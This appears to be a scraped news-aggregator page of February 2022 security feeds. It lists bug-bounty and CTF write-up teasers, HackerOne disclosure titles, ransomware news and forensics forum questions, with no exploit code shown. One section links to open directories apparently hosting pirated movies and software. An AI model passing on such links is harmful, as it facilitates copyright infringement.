    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    Bug Report; Bypassing Weekly Limits In Basic (Free) LinkedIn Account
    Publishing my first Security Vulnerability report for LinkedIn.Below is the report that I have submitted to LinkedIn Information Security… Continue reading on Medium »  ( 2 min )
    Hacked Dutch Government Website. All I got was this l̶o̶u̶s̶y̶ cool T-Shirt.
    They are right. Persistence is the key ! Continue reading on Medium »  ( 1 min )
    What is CSRF Attack ?
    Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they… Continue reading on Medium »  ( 2 min )
    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and I found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    ImmuneFi and Octopus Network Launch a Juicy Bug Bounty
    Octopus Network 🐙 Continue reading on Medium »  ( 3 min )
  • Open

    ‘Ice phishing’ on the blockchain
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-16 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Machine Learning Enrichment in your Data Asset Production Flow
    How discursus tackled the challenge of introducing ML enrichments in data asset production flows, using Dagster, dbt and Novacene AI. Continue reading on discursus.io »  ( 5 min )
    Power of Reverse Image Search — OSINT Challenge 16
    On Dec 22, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. Continue reading on Medium »  ( 1 min )
  • Open

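    How to do security R&D talent recruitment well: how to hire
    People are stubborn creatures; most find it hard to change their ingrained mindset once they reach adulthood. From this angle, selection matters more than training.
    Ukraine under the shadow of “large-scale hybrid warfare”
    On the “day of war”, cctv13's broadcast showed no bloody scenes of large-scale war; both Russia and Ukraine seemed to have fallen silent.  ( 1 min )
    FreeBuf Morning Report | Ukrainian military agencies and banks hit by cyberattacks; Singapore to introduce strong anti-scam measures
    Starting on the afternoon of February 15, 2022, Ukraine's Ministry of Defense, armed forces and state-owned banks came under DDoS attack  ( 1 min )
    Full online and offline coverage! A first look at the “new format” of the CIS 2021 conference, Spring edition
    Hello to all FreeBuf friends old and new, the CIS 2021 topics are here.  ( 1 min )
    A slap in the face: data leak at the Internet Society
    As a body that develops and promotes standards for the Internet and takes advancing the Internet as its mission, it has nonetheless suffered an information leak caused by a security flaw, which is rather embarrassing.  ( 1 min )
    Yak basic plugin case study: CDN detection
    A content delivery network (CDN) is a system of computers interconnected over the Internet; this article starts with CDNs and CDN configuration, then walks through the Yak basic plugin case in detail.  ( 3 min )
    New ransomware Coffee has an incubation period of up to 100 days; 360's decryption tool (360解密大师) is the only one to support decryption
    Recently, monitoring by 360 Security Brain (360安全大脑) found that Coffee, a new ransomware with worm-like properties, is at risk of spreading widely.
    Survey shows zero-trust strategy is well received by CSOs
    Implementing zero trust is an effective way to reduce cyber risk.  ( 1 min )
    Swissport hit by BlackCat ransomware attack
    Swiss airport services company Swissport was hit by a ransomware attack that for a time caused flight delays and service disruptions.
    Ukrainian banks and military agencies hit by DDoS attacks
    Yesterday afternoon, Ukraine's Ministry of Defense and armed forces, along with two of the country's state-owned banks, were hit by distributed denial-of-service (DDoS) attacks.
    Monitored by your employer from every angle when changing jobs? The lid can no longer be kept on
    With relevant domestic laws and regulations taking effect and public awareness of privacy protection awakening, the lid can no longer be kept on. Now that it has been lifted, we need to re-examine the issue.  ( 1 min )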
  • Open

    The Ultimate Secret To Red Team Engagements
    The key to a successful engagement is well-coordinated planning and communication through all parties involved. This blog post would focus… Continue reading on Medium »  ( 1 min )
    Here is how you can become an ethical hacker
    Ethical hackers are experienced professionals who find exploitable bugs and report to increase the cybersecurity posture of an… Continue reading on Medium »  ( 1 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and techniques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    Almost every publicly available CVE PoC
    Article URL: https://github.com/trickest/cve Comments URL: https://news.ycombinator.com/item?id=30357373 Points: 104 # Comments: 14  ( 3 min )
  • Open

    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30357335 Points: 2 # Comments: 0  ( 9 min )
  • Open

    How can I download a React site to edit it locally?
    I have done this before with wget and had no problems, however, I am trying to download this react app and am having a very hard time. For some reason it is only downloading the index.html page and when I click on another tab I get "GET /example" Error (404): "Not found" However, when I run wget on the /example page and grab example.html then it works, but this is not feasible for every page that I need to run. I am calling: wget --random-wait -r -p -e robots=off -U mozilla https://example.com What am I doing wrong / is there a better tool to do this? The site is hosted on Vercel and uses the Next.js framework Any help is much appreciated :) submitted by /u/tokentrader [link] [comments]  ( 2 min )

  • Open

    Why would a civilian private network be using a public IP range internally for device assignments (military netblock at that)?
    I was visiting a popular big box store today and was looking at one of their WiFi printers and saw this: https://imgur.com/a/fTZ1Emc Any idea why they are using a public ip range instead of something internal like 192, 172, 10 etc for IP assignments? The netblock according to ARIN belongs to the DoD (https://whois.domaintools.com/7.117.1.1) Just to make sure it wasn't a fluke, I also looked at another device on their network which also had a 7.117 IP. I just thought it was very strange. Any ideas? submitted by /u/LyleTillman [link] [comments]  ( 2 min )
    What's the Biggest Turn Off in Regards to Offensive Frameworks?
    I'm referring to software such as Metasploit, CobaltStrike, Armitage, Ramcos, etc.... submitted by /u/Blagojee [link] [comments]  ( 1 min )
    Burp Suite certificate question
    I was wondering if anyone has recently done their burp suite practitioner exam cert and how relatable it is to their practice test? Is burp suite pro REALLY necessary for the test? Just curious because it's for work and I don't want to pay for pro to not use it. My work has boxes set up with pro so my personal license won't be utilized except for the test. submitted by /u/phishingsudo [link] [comments]  ( 1 min )
    Is it possible to route ALL traffic from an idevice through a VPN?
    I'm somewhat new to idevice admin, so please excuse any ignorance. Is it possible to route literally ALL packets from an iPhone through a VPN? We're trying to get some stuff set up and we implemented a VPN by way of a user-installable app. Unfortunately it seems that on iOS there are a lot of connections that bypass this. For example when first connected to a wifi network the iPhone spams a flurry of connections to Apple's servers which don't go through the VPN. I've confirmed this by creating an "evil" wifi network that supports ipv4 only and blocks any connections to the 17.x.x.x range (which is wholly owned and operated by Apple), and even with the VPN active the logs show hundreds of connection attempts persistently. If I also block all Apple domains then half the stuff on the phone no longer works. App-based connections are routed correctly (Safari, etc), but the phone completely ignores the VPN for both DNS lookups and the connections themselves when it comes to system stuff and I'm not sure why. From my research it seems that maybe we need to ditch the app idea and instead implement an "always on" VPN by way of a mobileconfig file. This appears to require the iPhones to be supervised through MDM, which isn't a problem. I've taken a test phone, wiped and supervised it, but I'm having trouble figuring out how to create a mobileconfig that does what we want. Before I burn too many hours messing with this I'm wondering if anyone can help with the following two questions: Will an "always on" VPN on an iPhone actually route ALL packets through the VPN (including the system level phone-home initialization stuff, DNS lookups, ntp, etc) or is this not even the right approach? Assuming (1) is the correct approach, can someone point me to an example mobileconfig file that implements this so I can look at the structure and have a better idea of what I'm doing? submitted by /u/sneakertech [link] [comments]  ( 2 min )
    What are my options for an encrypted bootable flash drive containing 2 Linux OS, selection of which would be done by password alone at the bootloader / pre-boot stage.
    I want an encrypted bootable flash drive which contains 2 LINUX OS. The existence of either OS should be impossible to determine without a password. The flash drive should boot to a BOOTLOADER password prompt. Entering a wrong password should do nothing. Entering password A should boot OS A. Entering password B should boot OS B. After boot of A, it should not be possible to prove the existence of B. After boot of B, it should not be possible to prove the existence of A (i.e. if, by booting one of the OS, it is then possible to see that half the flash drive is 'unallocated' then we have probably failed our task). You're already thinking 'plausible deniability' is the phrase I'm looking for. Yes you're right - that's exactly what I want. I want what Veracrypt can do, but I want it for Linux, not Windows. Is it possible? I've looked at LUKS, but I don't see that it can do what I want. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]  ( 1 min )
    Is law enforcement/fed/military experience pretty much mandatory to become good at DFIR?
    We can say you can self study, learn all the material, join a SOC and pray for a promotion, get certifications, etc. I don't see a whole ton of jobs open for DFIR without explicit mention of tools, processes, and experience that one would have to accumulate in one of those sectors that isn't gated by 5-10 years of experience doing it. Additionally, it seems to me that most of the people who are pumping out books and learning material come from some kind of government background where they did incident response. Almost all hiring managers I've met have significant LE experience behind them. What I see much more of is people without this govt background going into pentesting, policy work, etc. Are you pretty much screwed for getting into DFIR at a large corp without a three letter agency or military on the resume? submitted by /u/Different-Area-3053 [link] [comments]  ( 2 min )
    Forensics Toolkits Recommendations? GCP Linux VM may have been compromised and used for crypto mining :/
    Hey y'all! I have a VM that was flagged by Google for potential compromise and being used for crypto mining (the CPU was flat out 50%, continuously for last several days). I immediately took down the machine, snapshotted and imaged it; rotated all security keys for GCP account. I don't think there is any nefarious activity and the compromise was likely to this one machine (or maybe I think that). I would like to find a tool that can show me last logins, various logs, any suspicious software etc. so that I can start digging or escalate. What tools, if any, would you recommend? I have been running individual commands like last, utmpdump, scrubbing logs manually but I figured there has to be a tool to make this easy. submitted by /u/sidgup [link] [comments]  ( 2 min )
  • Open

    ImmuneFi Bug Bounty Launched!
    Octopus Network is a brand new multichain network born to serve application-specific blockchains, aka appchains. Octopus Network provides… Continue reading on Octopus Network »  ( 2 min )
    Yet another enumeration of subdomains with statistics
    Or how to collect million of bugbounty subdomains in order to make a few wordlists. Continue reading on Medium »  ( 1 min )
    Do you want to start your career in Cyber Security — Read This .
    Cyber Security - Learn hack Secure. Continue reading on Medium »  ( 3 min )
    100 Days of Hacking — Day 10
    What’s up guys it’s the 10th day of #100DaysofHacking. 10% of the goal is achieved let’s go through today’s objectives and report Continue reading on Medium »  ( 2 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much! Continue reading on Medium »  ( 3 min )
    HigherLogic RCE In _VSTATE .NET
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    PORTSWIGGER WEB SECURITY - FILE UPLOAD LAB SOLUTIONS
    File upload is when a user uploads a file to a web server. For the user to upload files, web pages… Continue reading on Medium »  ( 10 min )
    Jax.Money testing: rewards up to $20,000 and more!
    by Ramyata Rao, Digital Marketing Manager at Jax.Network Continue reading on Jax.Network Blog »  ( 4 min )
    ​​How Did I Start Doing Bug Bounty?
    Since school, I have been reading Hacker (the Russian offensive security magazine) when I had the opportunity to buy it (then it was still… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Low Hanging Fruit
    Low-hanging fruit are bugs that are very easy to find. I would divide them into 2 more types. Continue reading on Medium »  ( 1 min )
  • Open

    A technique to semi-automatically discover new vulnerabilities in WordPress plugins
    submitted by /u/kazetkazet [link] [comments]
    GoIP-1 GSM gateway could be harnessed for phone fraud by hackers
    submitted by /u/ValtteriLe [link] [comments]
    Dependabot alternative for Clojure
    submitted by /u/mthbernardes [link] [comments]
    CVE-2021-44521 – Exploiting Apache Cassandra User-Defined Functions for Remote Code Execution
    submitted by /u/SRMish3 [link] [comments]
    A CLI SAST (Static application security testing) tool which was built with the intent of finding vulnerable Clojure code via rules that use a simple pattern language.
    submitted by /u/mthbernardes [link] [comments]  ( 1 min )
    merOS-virt - Build and Interact with a Set of Virtual Machines.
    submitted by /u/AranAilbhe [link] [comments]  ( 2 min )
    Advisory: Western Digital My Cloud Pro Series PR4100 RCE
    submitted by /u/g_e_r_h_a_r_d [link] [comments]  ( 1 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Google Rewards Indian Techie With $8.7M in vulnerability rewards
    Article URL: https://www.indiatimes.com/technology/news/google-thanks-indian-researcher-android-chrome-bug-561975.html Comments URL: https://news.ycombinator.com/item?id=30349459 Points: 9 # Comments: 1  ( 2 min )
  • Open

    An OSINT Path — In TryHackMe
    Hello Friends, Continue reading on Medium »  ( 1 min )
    Honeypot — Seoul, South Korea (Threat Analysis)
    Hello! Continue reading on Medium »  ( 5 min )
    TryHackMe Sakura Room CTF Write-Up
    My wired, unexplainable urge to get OSINT Dojo's Student Rank Badge has led me to this CTF, and now that I'm here, I realize that I can… Continue reading on Medium »  ( 4 min )
    Hacktoria: Geolocation 13 (Walkthrough)
    Hacktoria: Geolocation 13 (Walkthrough) Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-02-15 Review
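    Ultimate techniques for shrinking Java deserialization payloads by ourren; Explainable machine learning for solving network security problems by ourren; Starting from a Pegasus false positive by Avenger; Some thoughts on bypassing taint analysis by ourren; 2021 Online Financial Black Market Research Report by ourren. For more of the latest articles, visit SecWiki  ( 2 min )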
  • Open

    Question: Different imaging tools for acquisition
    I'm very new to computer forensics. Right now I'm exploring different data acquisition tools. I tried to image a usb device using FTK Imager (on a Windows system) and dd from the SIFT workstation (linux). I noticed that: 1. These two imaging tools provide image data of different sizes. 2. FTK automatically verifies the hash of the device and the image - both hashes were the same. 3. For the dd image, I verified it by myself and they were the same. I have few questions: 1. Why is the hash of the same device different on FTK (running on windows) and when checking on the SIFT Workstation (linux) ? 2. If different tools provide different images, do analysts use a combination of multiple tools? 3. I read about write blockers, I did not use one while imaging, could the difference be because of this? I'd be grateful if you could help me understand more about this process by answering my questions or sharing more resources that I could use. Thanks! submitted by /u/nybble04 [link] [comments]  ( 4 min )
    Overview of autopsy data artifacts, analysis results, and reporting. Part 2 of the autopsy series. nmap usage investigation as a case study.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    iCloud forensics
    Does anyone have any experience recovering permanently deleted iCloud data using Cellebrite? Or any other forensic tools? submitted by /u/Techn0prince [link] [comments]  ( 2 min )
    ENCE Certification
    Hi all, My Ence cert is up in April 22 and I would like to maintain accreditation. Unfortunately my role has a focus towards E-Discovery and not so much digital forensics so I may struggle to get aid from my employer re training and financing. Anyone have experience renewing? Are there any requirements for renewal? As I am likely having to purchase the training myself I don't want the training to be too expensive (particularly as it's not a skill I use day to day). I would likely benefit the most from Cellebrite or AXIOM training. TIA submitted by /u/Genzlol [link] [comments]  ( 1 min )
  • Open

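    Interview with Zheng Dongdong, technical director at Jidun (极盾): what can the much-hyped XDR bring to enterprises?
    Where exactly does the appeal of XDR security technology lie, and which problems can this highly anticipated technology solve?  ( 1 min )
    FreeBuf Morning Report | US critical infrastructure organizations breached by ransomware again; ECB asks banks to strengthen cyber defenses
    As the Ukraine crisis intensifies, the European Central Bank has warned banks of possible Russia-linked cyberattacks and asked them to strengthen their cyber defenses.  ( 1 min )
    2021 Online Financial Black Market Research Report
    With the latest wave of fintech development and industry transformation, the financial sector has accelerated its digital transformation; flexible and convenient financial business models give users better financial services but also face all kinds of new attack threats from a constantly evolving black market.  ( 1 min )
    A US company exposed the data of 7 million users
    An insecure Amazon S3 bucket contained the personal data of about 7 million people.  ( 1 min )
    Sports brand Mizuno hit by ransomware attack, delaying orders
    Sports equipment and apparel brand Mizuno suffered a ransomware attack on February 4. The attack seriously disrupted the company's business.
    Europe's largest car dealer hit by ransomware attack, Google urgently patches zero-day | Global cybersecurity highlights for February 15
    Emil Frey, one of Europe's largest car dealers, was hit by a ransomware attack last month; the Swiss company appeared on the Hive ransomware victim list on February 1.  ( 1 min )
    Announcement on changes to the format of the CIS 2021 Spring edition event
    Combining new offline and online formats, the CIS 2021 Spring edition looks forward to seeing you.  ( 1 min )
    Cybersecurity Review Measures take effect today; platforms holding a million users' information must undergo review before listing abroad
    The newly revised Cybersecurity Review Measures center on supply-chain security for critical information infrastructure, with a stronger focus on and regulation of data security.
    Google Chrome urgently patches a zero-day exploited in attacks
    Google has released Chrome for Windows, Mac and Linux to fix a high-severity zero-day vulnerability used by threat actors in attacks.
    CISA adds 15 new vulnerabilities to its Known Exploited Vulnerabilities Catalog
    The US Cybersecurity and Infrastructure Security Agency (CISA) has added another 15 vulnerabilities to its “Known Exploited Vulnerabilities Catalog”.  ( 1 min )
    FBI: BlackByte ransomware has breached US critical infrastructure
    A joint cybersecurity advisory from the FBI and the US Secret Service shows that the BlackByte ransomware group has breached at least 3 US critical infrastructure entities over the past 3 months.  ( 1 min )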
  • Open

    Cross-origin resource sharing
    Showmax disclosed a bug submitted by qualin: https://hackerone.com/reports/1478449 - Bounty: $50
    When sharing a Deck card in conversation the metaData can be manipulated to open arbitrary URL
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1358977 - Bounty: $100
    Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click)
    Shopify disclosed a bug submitted by saurabhsankhwar3: https://hackerone.com/reports/1406495 - Bounty: $900
  • Open

    Pretty decent collection of movies that is well organized (as well as software and other stuff)
    ​ http://162.12.215.254/Data/ I was looking for the movies and the English ones are mostly good quality, and without any burned in subs or forced dual languages. ​ Sorry if repost. Found searching, "English" in search box with "video" in ['filegroup or ext'] box on eyedex.org submitted by /u/Rest-in-Peep [link] [comments]  ( 1 min )
    First contribution
    https://who.4386.ltd/Doctor/ I think all marvel files are in 4K. there are more movies in the "movies for" tab. https://who.4386.ltd/Heng/ P.S. the site is in chinese so let chrome translate the page first. submitted by /u/CompetitiveMango12 [link] [comments]  ( 1 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hacking Wordle
    How to guess the word of the day through reverse engineering Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )
  • Open

    “That SweetPot of Data Net-tar” My first Honey Pot Walkthrough Part 3
    Part 1 Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on InfoSec Write-ups »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on Medium »  ( 5 min )
    I Too Want a Key Collection — OSINT Challenge 15
    On Jan 20, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out when the… Continue reading on Medium »  ( 2 min )
    How To Find Your Data In Web With Pimeyes And Other Reverse Tools
    Reverse Image Search is a web-based tool for finding identical and similar images related to the image you are looking for. Marketers can… Continue reading on Medium »  ( 2 min )
  • Open

    The Unobvious About XSS and HTML Encoding
    Many people know that before getting the value of a tag attribute, the browser decodes the HTML entities inside. Let’s say if you try to… Continue reading on Medium »  ( 2 min )
    How to get into bug bounties — A list of resources by The XSS Rat
    Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about… Continue reading on Medium »
    What is the Bug Bounty ?
    Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape… Continue reading on CyberSecurity and GDPR compliance »  ( 3 min )
    Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    How I did Full Account Takeover (FATO) using forgot password link?
    How I was able to takeover admin account by exploiting forgot password functionality. Continue reading on Medium »  ( 2 min )
    Broken Access Control Overview
    As I was going through web application vulnerabilities during my 100 days of hacking, I came across this interesting topic Broken Access… Continue reading on Medium »  ( 1 min )
    BigQuery SQL Injection Cheat Sheet
    Last year, we (My researcher partner on this topic, Anil and me) and found a SQL injection vulnerability on a target at Synack which was… Continue reading on Medium »  ( 5 min )
    Bug Bounty — Bypassing Endpoints
    Hello there, let’s discuss on how to bypass endpoints. Before moving further, let’s take a quick glance about endpoints. Continue reading on Medium »  ( 2 min )
    My First Bounty and How I Got It
    Hello!! This is my first article, and I really hope you enjoy it! From June 2021, I began looking for issues on the websites. Continue reading on Medium »  ( 1 min )
    Javascript Security — Weak Type Bypass
    As you may know, Javascript is a weakly typed language. This features of the language can be used by hackers to bypass some checks within… Continue reading on Medium »  ( 1 min )
  • Open

    PrivateLoader to new Anubis Loader
    submitted by /u/sysopfb [link] [comments]
    Eliminating Dangling Elastic IP Takeovers with Ghostbuster
    submitted by /u/Mempodipper [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Concrete CMS part2 (Privesc/SSRF/etc.)
    submitted by /u/adrian_rt [link] [comments]
    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/chicksdigthelongrun [link] [comments]
    MyloBot 2022 – Analysis of the new version of this evasive botnet that appears to just send extortion emails, but has the potential to do much more.
    submitted by /u/woja111 [link] [comments]  ( 1 min )
  • Open

    Arbitrary File Read at via filename parameter
    U.S. Dept Of Defense disclosed a bug submitted by shiar: https://hackerone.com/reports/1436223
    Broken Authentication
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/409237
    IDOR
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/389250
    CUI Labelled document out in the open
    U.S. Dept Of Defense disclosed a bug submitted by pll25: https://hackerone.com/reports/1436460
    EC2 subdomain takeover at http:///
    U.S. Dept Of Defense disclosed a bug submitted by dreyand72: https://hackerone.com/reports/1296366
    XSS trigger via HTML Iframe injection in ( https:// ) due to unfiltered HTML tags
    U.S. Dept Of Defense disclosed a bug submitted by rozerx00: https://hackerone.com/reports/1200770
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457277
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457546
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457493
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457444
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457413
    (CORS) Cross-origin resource sharing misconfiguration on https://
    U.S. Dept Of Defense disclosed a bug submitted by fiveguyslover: https://hackerone.com/reports/995144
    default creds on https://
    U.S. Dept Of Defense disclosed a bug submitted by pirateducky: https://hackerone.com/reports/711662
    Unauthorized access to PII leads to MASS account Takeover
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1061736
    RXSS ON https://
    U.S. Dept Of Defense disclosed a bug submitted by iam_a_jinchuriki: https://hackerone.com/reports/1244145
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1415825
  • Open

    Preventing Replay Attacks
    Hey all, I'm going to be participating in an Attack/Defend CTF, and apparently one of the biggest vulnerabilities from previous competitions was replay attacks. Some more details: The server that is traditionally vulnerable to replay attacks is a headless Arch Linux box with limited disk space and no access to the Internet. I have superuser access to this box via SSH; This server exists outside of our defensive LAN. Its sole responsibility is relaying commands to/from external entities. Think like a self-driving Tesla car being told what to do: "Turn left, turn left, turn left...". I should underscore that if an attacker replayed these commands, the car would inevitably crash. I've configured the IPtables on the box to: Drop invalid traffic; Accept existing traffic; Accept SSH from our administrative workstation; Accept commands from our client workstation; Forward traffic to the external entities; and Drop everything else. I want to inquire about any lightweight transport layer security options that I could implement to secure the bidirectional communication. I'm exploring IPsec/VPNs but I haven't found success. I just wanted to ask if I was missing anything simple here. Thank you for your time. submitted by /u/InfamousClyde [link] [comments]  ( 1 min )
    Alienvault OSSIM OTX Issue
    So I just set up a new OSSIM instance from scratch. I've added my API key (and have subsequently regenerated new ones for troubleshooting). I'm not sure how long I have to wait for the OTX subscriptions to sync and download to the OSSIM client, but when I click the dropdown on the OTX page in OSSIM, and click on View Account Details, it takes me to the otx.alienvault.com webpage, and shows that I'm not following or subscribed to any pulses. However, if I log into OTX with the same account, it shows that I am subscribed to several. I've run the 'curl' command to test the OTX-API key and it worked without error. I've also noticed that another alarm I am receiving is "no information available. you are no longer subscribed to this pulse" but there is no information as to what pulse they're referring to. And googling it found an Alienvault KB that said it was fixed in 5.4. I'm on 5.8 (the latest version, up to date as well). Anyone else having this issue with Alienvault OSSIM and OTX not syncing? If there's a command to force sync (I've done the option in the console for updating the threat feeds), that would be appreciated. submitted by /u/Phyxiis [link] [comments]  ( 1 min )
    Building a forensics lab - what are must haves? Any templates?
    We have some spare resources and we're looking to build a dedicated forensics, analysis lab. We have a couple poweredges we can use. The current plan is a segregated environment to clone suspect machines and see how they interact and do whatever analysis is required. I don't really know where to start except segregating it or having a faux network connection. It seems a lot of people just run labs locally, however we're required to essentially have thin clients. What have your team built for this? Any must have tools? submitted by /u/idnUygelps [link] [comments]  ( 3 min )
    What are the Open Source Tools Network Scanning Tools?
    We are a medium size healthcare medical center, maybe 300 nodes. What are the available open source /free tools I can use to achieve this use case ? Scanner that will say “2 new systems in this". Results should give me the OS version and check if antivirus is installed. submitted by /u/techno_it [link] [comments]  ( 1 min )
    Using Tomcat Virtual Host Manager
    I found access to Tomcat Virtual Host Manager on Tomcat 9 (not the one that deploys WAR files) which according to docs means the account has the role "admin-gui". I've been asked if I can pivot further using this but I'm completely stuck because I've never used it. All I can use is a form which can "Add Virtual Host" but from my testing (and limited experience with Tomcat) I've run into a halt. Anyone know if this can be used to privesc? submitted by /u/plutofoxtrot [link] [comments]  ( 1 min )
    LastPass free account with yubikey?
    Lastpass free account by default doesn't support Yubikey. But lastpass support Google auth. In theory, they are all compatible because of the same protocol. Can I just set select "Google Auth." then go ahead and use my Yubico auth. app? Thanks. Anyone has experience? submitted by /u/mk_life [link] [comments]  ( 1 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 2 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/dmchell [link] [comments]
    cube0x0/KrbRelay: Framework for Kerberos relaying
    submitted by /u/dmchell [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]
    Install Invisible Malicious Apps Remotely, Acting As Updates
    submitted by /u/banginpadr [link] [comments]
    How I Hacked A Reputed Hacker
    submitted by /u/banginpadr [link] [comments]
  • Open

    Preventing, Detecting, & Hunting for Exploitation of the Log4j 2 Vulnerability
    Article URL: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ Comments URL: https://news.ycombinator.com/item?id=30335183 Points: 2 # Comments: 0  ( 28 min )
  • Open

    aimbot idea?
    I was thinking that what if there was a type of screen reader or something like that that detected enemy characters in a video game and locked your mouse to it? is that even possible? just an idea I don't know the technicalities submitted by /u/mr_killlerrrrr [link] [comments]  ( 1 min )
  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )
  • Open

